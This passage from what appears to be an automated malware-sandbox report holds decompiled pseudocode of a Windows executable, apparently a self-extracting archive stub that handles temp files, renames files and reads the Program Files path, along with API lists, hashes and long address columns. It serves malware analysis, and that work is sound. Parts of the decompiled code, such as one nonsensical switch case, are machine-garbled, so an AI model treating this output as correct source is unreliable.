                                            0x00c393ec
                                            0x00c393ec
                                            0x00c393fc
                                            0x00c39400
                                            0x00c39408
                                            0x00c39413
                                            0x00c39413
                                            0x00c3941e
                                            0x00c39423
                                            0x00c39423
                                            0x00c393c4
                                            0x00c3930d
                                            0x00c392f8
                                            0x00c392e7
                                            0x00c392bf
                                            0x00c392b7
                                            0x00c39429
                                            0x00c3942f
                                            0x00c39439

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00C3926D
                                            • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00C39290
                                            • GetShortPathNameW.KERNEL32 ref: 00C392AF
                                              • Part of subcall function 00C41410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00C3ACFE,?,?,?,00C3ACAD,?,-00000002,?,00000000,?), ref: 00C41426
                                            • _swprintf.LIBCMT ref: 00C3934B
                                              • Part of subcall function 00C33E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C33E54
                                            • MoveFileW.KERNEL32(?,?), ref: 00C393C0
                                            • MoveFileW.KERNEL32(?,?), ref: 00C393FC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                            • String ID: rtmp%d
                                            • API String ID: 2111052971-3303766350
                                            • Opcode ID: 12afd06986fed3c729cc3e73ff0d956414736955deb3ecbd9e439882be244c5b
                                            • Instruction ID: 6741d649fad3a7836b28ff45447fd103fa8b65832099e2175432e65a835f0e16
                                            • Opcode Fuzzy Hash: 12afd06986fed3c729cc3e73ff0d956414736955deb3ecbd9e439882be244c5b
                                            • Instruction Fuzzy Hash: 6041BD76921259A6CF20EBA0CD84FEE737CEF44381F0444A5B645E3052EAB4DF85DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5E2ED, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 77%
                                            			E00C5E2ED(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0xc6d668; // 0x13bcba52
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xc90420 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xc90420 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00C59474(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xc90420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xc90420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xc90420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00C5804C( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00C5804C();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E00C4E203(_t135, _v8 ^ _t136);
			}


































                                            0x00c5e2f5
                                            0x00c5e2fc
                                            0x00c5e2ff
                                            0x00c5e307
                                            0x00c5e30b
                                            0x00c5e317
                                            0x00c5e31a
                                            0x00c5e31d
                                            0x00c5e324
                                            0x00c5e32c
                                            0x00c5e32f
                                            0x00c5e335
                                            0x00c5e33b
                                            0x00c5e340
                                            0x00c5e342
                                            0x00c5e345
                                            0x00c5e34a
                                            0x00c5e354
                                            0x00c5e35b
                                            0x00c5e35e
                                            0x00c5e365
                                            0x00c5e36c
                                            0x00c5e398
                                            0x00c5e3be
                                            0x00c5e3c0
                                            0x00000000
                                            0x00c5e39a
                                            0x00c5e39d
                                            0x00c5e464
                                            0x00c5e470
                                            0x00c5e47b
                                            0x00c5e480
                                            0x00c5e3a3
                                            0x00c5e3aa
                                            0x00c5e3af
                                            0x00c5e3b5
                                            0x00c5e3bb
                                            0x00000000
                                            0x00c5e3bb
                                            0x00c5e3b5
                                            0x00c5e39d
                                            0x00c5e36e
                                            0x00c5e372
                                            0x00c5e375
                                            0x00c5e37b
                                            0x00c5e37d
                                            0x00c5e380
                                            0x00c5e384
                                            0x00c5e3c1
                                            0x00c5e3c4
                                            0x00c5e3c5
                                            0x00c5e3ca
                                            0x00c5e3d0
                                            0x00c5e3d6
                                            0x00c5e3e5
                                            0x00c5e3eb
                                            0x00c5e3f1
                                            0x00c5e3f6
                                            0x00c5e412
                                            0x00c5e485
                                            0x00c5e48b
                                            0x00c5e414
                                            0x00c5e414
                                            0x00c5e41c
                                            0x00c5e425
                                            0x00c5e42b
                                            0x00000000
                                            0x00c5e42d
                                            0x00c5e42f
                                            0x00c5e432
                                            0x00c5e44b
                                            0x00000000
                                            0x00c5e44d
                                            0x00c5e451
                                            0x00c5e453
                                            0x00c5e456
                                            0x00000000
                                            0x00c5e456
                                            0x00c5e451
                                            0x00c5e44b
                                            0x00c5e42b
                                            0x00c5e425
                                            0x00c5e412
                                            0x00c5e3f6
                                            0x00c5e3d0
                                            0x00000000
                                            0x00c5e459
                                            0x00c5e459
                                            0x00c5e48d
                                            0x00c5e49f

                                            APIs
                                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00C5EA62,00000000,00000000,00000000,00000000,00000000,00C53FBF), ref: 00C5E32F
                                            • __fassign.LIBCMT ref: 00C5E3AA
                                            • __fassign.LIBCMT ref: 00C5E3C5
                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00C5E3EB
                                            • WriteFile.KERNEL32(?,00000000,00000000,00C5EA62,00000000,?,?,?,?,?,?,?,?,?,00C5EA62,00000000), ref: 00C5E40A
                                            • WriteFile.KERNEL32(?,00000000,00000001,00C5EA62,00000000,?,?,?,?,?,?,?,?,?,00C5EA62,00000000), ref: 00C5E443
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                            • String ID:
                                            • API String ID: 1324828854-0
                                            • Opcode ID: 58859c9569cba0c6e03f7cf9fbfa36c5dd96f1ecd5173ed28c22a4fbdd6d829f
                                            • Instruction ID: 0f7373b0bed29114679320ea9b2cb807bb75194eebace2871a46c19ba997f32b
                                            • Opcode Fuzzy Hash: 58859c9569cba0c6e03f7cf9fbfa36c5dd96f1ecd5173ed28c22a4fbdd6d829f
                                            • Instruction Fuzzy Hash: E75115B4E002489FCB14CFA8D885BEEBBF9FF08311F14411AE951E3291D7309A85CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4BB5B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 52%
                                            			E00C4BB5B(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t209;
				void* _t210;
				intOrPtr _t263;
				WCHAR* _t277;
				void* _t279;
				WCHAR* _t280;
				void* _t285;

				L0:
				while(1) {
					L0:
					_t263 = __ebx;
					if(__ebx != 1) {
						goto L112;
					}
					L96:
					__eax = __ebp - 0x7c84;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
					E00C3AEA5(__eflags, __ebp - 0x7c84, 0x800) = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L98:
						_push( *0xc6d5f8);
						__ebp - 0x7c84 = E00C33E41(0xc785fa, __edi, L"%s%s%u", __ebp - 0x7c84);
						__eax = E00C39E6B(0xc785fa);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L97:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L99:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xc785fa);
					__eflags =  *(__ebp - 0x5c84);
					if( *(__ebp - 0x5c84) == 0) {
						while(1) {
							L164:
							_push(0x1000);
							_t197 = _t285 - 0xe; // 0xffffa36e
							_t198 = _t285 - 0xd; // 0xffffa36f
							_t199 = _t285 - 0x5c84; // 0xffff46f8
							_t200 = _t285 - 0xfc8c; // 0xfffea6f0
							_push( *((intOrPtr*)(_t285 + 0xc)));
							_t209 = E00C4A156();
							_t263 =  *((intOrPtr*)(_t285 + 0x10));
							 *((intOrPtr*)(_t285 + 0xc)) = _t209;
							if(_t209 != 0) {
								_t210 = _t285 - 0x5c84;
								_t279 = _t285 - 0x1bc8c;
								_t277 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00C41410(_t285 - 0xfc8c,  *((intOrPtr*)(0xc6d618 + _t280 * 4))) != 0) {
								_t280 =  &(_t280[0]);
								if(_t280 < 0xe) {
									continue;
								} else {
									goto L164;
								}
							}
							__eflags = _t280 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t280 * 4 +  &M00C4C0D7))) {
								case 0:
									L9:
									__eflags = _t263 - 2;
									if(_t263 != 2) {
										goto L164;
									}
									L10:
									_t282 = 0x800;
									E00C495F8(_t285 - 0x7c84, 0x800);
									E00C3A188(E00C3B625(_t285 - 0x7c84, _t285 - 0x5c84, _t285 - 0xdc8c, 0x800), _t263, _t285 - 0x8c8c, 0x800);
									 *(_t285 - 4) = _t277;
									E00C3A2C2(_t285 - 0x8c8c, _t285 - 0xdc8c);
									E00C36EF9(_t285 - 0x3c84);
									_push(_t277);
									_t271 = _t285 - 0x8c8c;
									_t224 = E00C3A215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
									__eflags = _t224;
									if(_t224 == 0) {
										L26:
										 *(_t285 - 4) =  *(_t285 - 4) | 0xffffffff;
										E00C3A19E(_t285 - 0x8c8c);
										goto L164;
									} else {
										goto L13;
										L14:
										E00C3B1B7(_t271, __eflags, _t285 - 0x7c84, _t285 - 0x103c, _t282);
										E00C3AEA5(__eflags, _t285 - 0x103c, _t282);
										_t284 = E00C52B33(_t285 - 0x7c84);
										__eflags = _t284 - 4;
										if(_t284 < 4) {
											L16:
											_t252 = E00C3B5E5(_t285 - 0x5c84);
											__eflags = _t252;
											if(_t252 != 0) {
												goto L26;
											}
											L17:
											_t254 = E00C52B33(_t285 - 0x3c84);
											__eflags = 0;
											 *((short*)(_t285 + _t254 * 2 - 0x3c82)) = 0;
											E00C4E920(_t277, _t285 - 0x3c, _t277, 0x1e);
											_t287 = _t287 + 0x10;
											 *((intOrPtr*)(_t285 - 0x38)) = 3;
											_push(0x14);
											_pop(_t257);
											 *((short*)(_t285 - 0x2c)) = _t257;
											 *((intOrPtr*)(_t285 - 0x34)) = _t285 - 0x3c84;
											_push(_t285 - 0x3c);
											 *0xc6def4();
											goto L18;
										}
										L15:
										_t262 = E00C52B33(_t285 - 0x103c);
										__eflags = _t284 - _t262;
										if(_t284 > _t262) {
											goto L17;
										}
										goto L16;
										L18:
										_t229 = GetFileAttributesW(_t285 - 0x3c84);
										__eflags = _t229 - 0xffffffff;
										if(_t229 == 0xffffffff) {
											L25:
											_push(_t277);
											_t271 = _t285 - 0x8c8c;
											_t231 = E00C3A215(_t285 - 0x8c8c, _t276, _t285 - 0x3c84);
											__eflags = _t231;
											if(_t231 != 0) {
												_t282 = 0x800;
												L13:
												SetFileAttributesW(_t285 - 0x3c84, _t277);
												__eflags =  *((char*)(_t285 - 0x2c78));
												if(__eflags == 0) {
													goto L18;
												}
												goto L14;
											}
											goto L26;
										}
										L19:
										_t233 = DeleteFileW(_t285 - 0x3c84);
										__eflags = _t233;
										if(_t233 != 0) {
											goto L25;
										} else {
											_t283 = _t277;
											_push(_t277);
											goto L22;
											L22:
											E00C33E41(_t285 - 0x103c, 0x800, L"%s.%d.tmp", _t285 - 0x3c84);
											_t287 = _t287 + 0x14;
											_t238 = GetFileAttributesW(_t285 - 0x103c);
											__eflags = _t238 - 0xffffffff;
											if(_t238 != 0xffffffff) {
												_t283 = _t283 + 1;
												__eflags = _t283;
												_push(_t283);
												goto L22;
											} else {
												_t241 = MoveFileW(_t285 - 0x3c84, _t285 - 0x103c);
												__eflags = _t241;
												if(_t241 != 0) {
													MoveFileExW(_t285 - 0x103c, _t277, 4);
												}
												goto L25;
											}
										}
									}
								case 1:
									L27:
									__eflags = __ebx;
									if(__ebx == 0) {
										__eax =  *0xc8ce0c;
										__eflags =  *0xc8ce0c;
										__ebx = __ebx & 0xffffff00 |  *0xc8ce0c == 0x00000000;
										__eflags = __bl;
										if(__bl == 0) {
											__eax =  *0xc8ce0c;
											_pop(__ecx);
											_pop(__ecx);
										}
										L30:
										__bh =  *((intOrPtr*)(__ebp - 0xd));
										__eflags = __bh;
										if(__eflags == 0) {
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__esi = E00C4A2AE(__ecx, __edx, __eflags);
											__eax =  *0xc8ce0c;
										} else {
											__esi = __ebp - 0x5c84;
										}
										__eflags = __bl;
										if(__bl == 0) {
											__edi = __eax;
										}
										L35:
										__eax = E00C52B33(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0xc8ce0c);
										__eax = E00C52B5E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax != 0) {
											 *0xc8ce0c = __eax;
											__eflags = __bl;
											if(__bl != 0) {
												__ecx = 0;
												__eflags = 0;
												 *__eax = __cx;
											}
											__eax = E00C566ED(__eax, __esi);
											_pop(__ecx);
											_pop(__ecx);
										}
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L00C52B4E(__esi);
										}
									}
									goto L164;
								case 2:
									L41:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
									}
									goto L164;
								case 3:
									L43:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L164;
									}
									L44:
									__eflags =  *0xc79602 - __di;
									if( *0xc79602 != __di) {
										goto L164;
									}
									L45:
									__eax = 0;
									__edi = __ebp - 0x5c84;
									_push(0x22);
									 *(__ebp - 0x103c) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x5c84) - __ax;
									if( *(__ebp - 0x5c84) == __ax) {
										__edi = __ebp - 0x5c82;
									}
									__eax = E00C52B33(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L164;
									} else {
										L48:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L52:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L64:
												__ebp - 0x103c = E00C3FAB1(__ebp - 0x103c, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L65:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x103c;
												__eax = E00C50D9B(__ebp - 0x103c, __ebp - 0x103c);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
													if( *((intOrPtr*)(__eax + 2)) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x103c;
												__edi = 0xc79602;
												E00C3FAB1(0xc79602, __ebp - 0x103c, __esi) = __ebp - 0x103c;
												__eax = E00C49FFC(__ebp - 0x103c, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
												__ebx =  *0xc6df7c;
												__eax = SendMessageW(__esi, 0x143, __ebx, 0xc79602); // executed
												__eax = __ebp - 0x103c;
												__eax = E00C52B69(__ebp - 0x103c, 0xc79602, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x103c = 0;
													__eax = SendMessageW(__esi, 0x143, 0, __ebp - 0x103c);
												}
												goto L164;
											}
											L53:
											__eflags = __ax;
											if(__ax == 0) {
												L55:
												__eax = __ebp - 0x18;
												__ebx = 0;
												_push(__ebp - 0x18);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0xc6dea8();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x103c;
													_push(__ebp - 0x103c);
													__eax = __ebp - 0x1c;
													_push(__ebp - 0x1c);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x18));
													__eax =  *0xc6dea4();
													_push( *(__ebp - 0x18));
													 *0xc6de84() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *((short*)(__ebp + __eax * 2 - 0x103c)) = __cx;
												}
												__eflags =  *(__ebp - 0x103c) - __bx;
												if( *(__ebp - 0x103c) != __bx) {
													__eax = __ebp - 0x103c;
													__eax = E00C52B33(__ebp - 0x103c);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x103c = E00C3FA89(__eflags, __ebp - 0x103c, "\\", __esi);
													}
												}
												__esi = E00C52B33(__edi);
												__eax = __ebp - 0x103c;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x103c = E00C3FA89(__eflags, __ebp - 0x103c, __edi, 0x800);
												}
												goto L65;
											}
											L54:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L64;
											}
											goto L55;
										}
										L49:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L52;
										}
										L50:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L164;
										}
										L51:
										__ebp - 0x103c = E00C3FAB1(__ebp - 0x103c, __edi, 0x800);
										goto L65;
									}
								case 4:
									L70:
									__eflags =  *0xc795fc - 1;
									__eflags = __eax - 0xc795fc;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__ebx + 6) & __bl;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L75:
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L82:
										 *0xc775d2 = __cl;
										 *0xc775d3 = 1;
										goto L164;
									}
									L76:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0xc775d2 = __cl;
										L81:
										 *0xc775d3 = __cl;
										goto L164;
									}
									L77:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L82;
									}
									L78:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L164;
									}
									L79:
									 *0xc775d2 = 1;
									goto L81;
								case 6:
									L88:
									__eflags = __ebx - 4;
									if(__ebx != 4) {
										goto L92;
									}
									L89:
									__eax = __ebp - 0x5c84;
									__eax = E00C52B69(__ebp - 0x5c84, __eax, L"<>");
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax == 0) {
										goto L92;
									}
									L90:
									_push(__edi);
									goto L91;
								case 7:
									goto L0;
								case 8:
									L116:
									__eflags = __ebx - 3;
									if(__ebx == 3) {
										__eflags =  *(__ebp - 0x5c84) - __di;
										if(__eflags != 0) {
											__eax = __ebp - 0x5c84;
											_push(__ebp - 0x5c84);
											__eax = E00C5668C(__ebx, __edi);
											_pop(__ecx);
											 *0xc8de1c = __eax;
										}
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										 *0xc8de18 = E00C4A2AE(__ecx, __edx, __eflags);
									}
									 *0xc85d03 = 1;
									goto L164;
								case 9:
									L121:
									__eflags = __ebx - 5;
									if(__ebx != 5) {
										L92:
										 *0xc8de20 = 1;
										goto L164;
									}
									L122:
									_push(1);
									L91:
									__eax = __ebp - 0x5c84;
									_push(__ebp - 0x5c84);
									_push( *(__ebp + 8));
									__eax = E00C4C431();
									goto L92;
								case 0xa:
									L123:
									__eflags = __ebx - 6;
									if(__ebx != 6) {
										goto L164;
									}
									L124:
									__eax = 0;
									 *(__ebp - 0x2c3c) = __ax;
									__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
									__eax = E00C559C0( *(__ebp - 0x1bc8c) & 0x0000ffff);
									_push(0x800);
									__eflags = __eax - 0x50;
									if(__eax == 0x50) {
										_push(0xc8ad0a);
										__eax = __ebp - 0x2c3c;
										_push(__ebp - 0x2c3c);
										__eax = E00C3FAB1();
										 *(__ebp - 0x14) = 2;
									} else {
										__eflags = __eax - 0x54;
										__eax = __ebp - 0x2c3c;
										if(__eflags == 0) {
											_push(0xc89d0a);
											_push(__eax);
											__eax = E00C3FAB1();
											 *(__ebp - 0x14) = 7;
										} else {
											_push(0xc8bd0a);
											_push(__eax);
											__eax = E00C3FAB1();
											 *(__ebp - 0x14) = 0x10;
										}
									}
									__eax = 0;
									 *(__ebp - 0x9c8c) = __ax;
									 *(__ebp - 0x1c3c) = __ax;
									__ebp - 0x19c8c = __ebp - 0x6c84;
									__eax = E00C54D7E(__ebp - 0x6c84, __ebp - 0x19c8c);
									_pop(__ecx);
									_pop(__ecx);
									_push(0x22);
									_pop(__ebx);
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) != __bx) {
										L132:
										__ebp - 0x6c84 = E00C39E6B(__ebp - 0x6c84);
										__eflags = __al;
										if(__al != 0) {
											goto L149;
										}
										L133:
										__ebx = __edi;
										__esi = __ebp - 0x6c84;
										__eflags =  *(__ebp - 0x6c84) - __bx;
										if( *(__ebp - 0x6c84) == __bx) {
											goto L149;
										}
										L134:
										_push(0x20);
										_pop(__ecx);
										do {
											L135:
											__eax = __esi->i & 0x0000ffff;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L137:
												__edi = __eax;
												__eax = 0;
												__esi->i = __ax;
												__ebp - 0x6c84 = E00C39E6B(__ebp - 0x6c84);
												__eflags = __al;
												if(__al == 0) {
													L144:
													__esi->i = __di;
													L145:
													_push(0x20);
													_pop(__ecx);
													__edi = 0;
													__eflags = 0;
													goto L146;
												}
												L138:
												_push(0x2f);
												_pop(__eax);
												__ebx = __esi;
												__eflags = __di - __ax;
												if(__di != __ax) {
													L140:
													_push(0x20);
													_pop(__eax);
													do {
														L141:
														__esi =  &(__esi->i);
														__eflags = __esi->i - __ax;
													} while (__esi->i == __ax);
													_push(__esi);
													__eax = __ebp - 0x1c3c;
													L143:
													_push(__eax);
													__eax = E00C54D7E();
													_pop(__ecx);
													_pop(__ecx);
													 *__ebx = __di;
													goto L145;
												}
												L139:
												 *(__ebp - 0x1c3c) = __ax;
												__eax =  &(__esi->i);
												_push( &(__esi->i));
												__eax = __ebp - 0x1c3a;
												goto L143;
											}
											L136:
											_push(0x2f);
											_pop(__edx);
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L146;
											}
											goto L137;
											L146:
											__esi =  &(__esi->i);
											__eflags = __esi->i - __di;
										} while (__esi->i != __di);
										__eflags = __ebx;
										if(__ebx != 0) {
											__eax = 0;
											__eflags = 0;
											 *__ebx = __ax;
										}
										goto L149;
									} else {
										L130:
										__ebp - 0x19c8a = __ebp - 0x6c84;
										E00C54D7E(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
										_push(__ebx);
										_push(__ebp - 0x6c82);
										__eax = E00C50BB8(__ecx);
										__esp = __esp + 0x10;
										__eflags = __eax;
										if(__eax != 0) {
											__ecx = 0;
											 *__eax = __cx;
											__ebp - 0x1c3c = E00C54D7E(__ebp - 0x1c3c, __ebp - 0x1c3c);
											_pop(__ecx);
											_pop(__ecx);
										}
										L149:
										__eflags =  *(__ebp - 0x11c8c);
										__ebx = 0x800;
										if( *(__ebp - 0x11c8c) != 0) {
											_push(0x800);
											__eax = __ebp - 0x9c8c;
											_push(__ebp - 0x9c8c);
											__eax = __ebp - 0x11c8c;
											_push(__ebp - 0x11c8c);
											__eax = E00C3AED7();
										}
										_push(__ebx);
										__eax = __ebp - 0xbc8c;
										_push(__ebp - 0xbc8c);
										__eax = __ebp - 0x6c84;
										_push(__ebp - 0x6c84);
										__eax = E00C3AED7();
										__eflags =  *(__ebp - 0x2c3c);
										if(__eflags == 0) {
											__ebp - 0x2c3c = E00C4A24E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14));
										}
										__ebp - 0x2c3c = E00C3AEA5(__eflags, __ebp - 0x2c3c, __ebx);
										__eflags =  *((short*)(__ebp - 0x17c8c));
										if(__eflags != 0) {
											__ebp - 0x17c8c = __ebp - 0x2c3c;
											E00C3FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
											__eax = E00C3AEA5(__eflags, __ebp - 0x2c3c, __ebx);
										}
										__ebp - 0x2c3c = __ebp - 0xcc8c;
										__eax = E00C54D7E(__ebp - 0xcc8c, __ebp - 0x2c3c);
										__eflags =  *(__ebp - 0x13c8c);
										__eax = __ebp - 0x13c8c;
										_pop(__ecx);
										_pop(__ecx);
										if(__eflags == 0) {
											__eax = __ebp - 0x19c8c;
										}
										__ebp - 0x2c3c = E00C3FA89(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
										__eax = __ebp - 0x2c3c;
										__eflags = E00C3B153(__ebp - 0x2c3c);
										if(__eflags == 0) {
											L159:
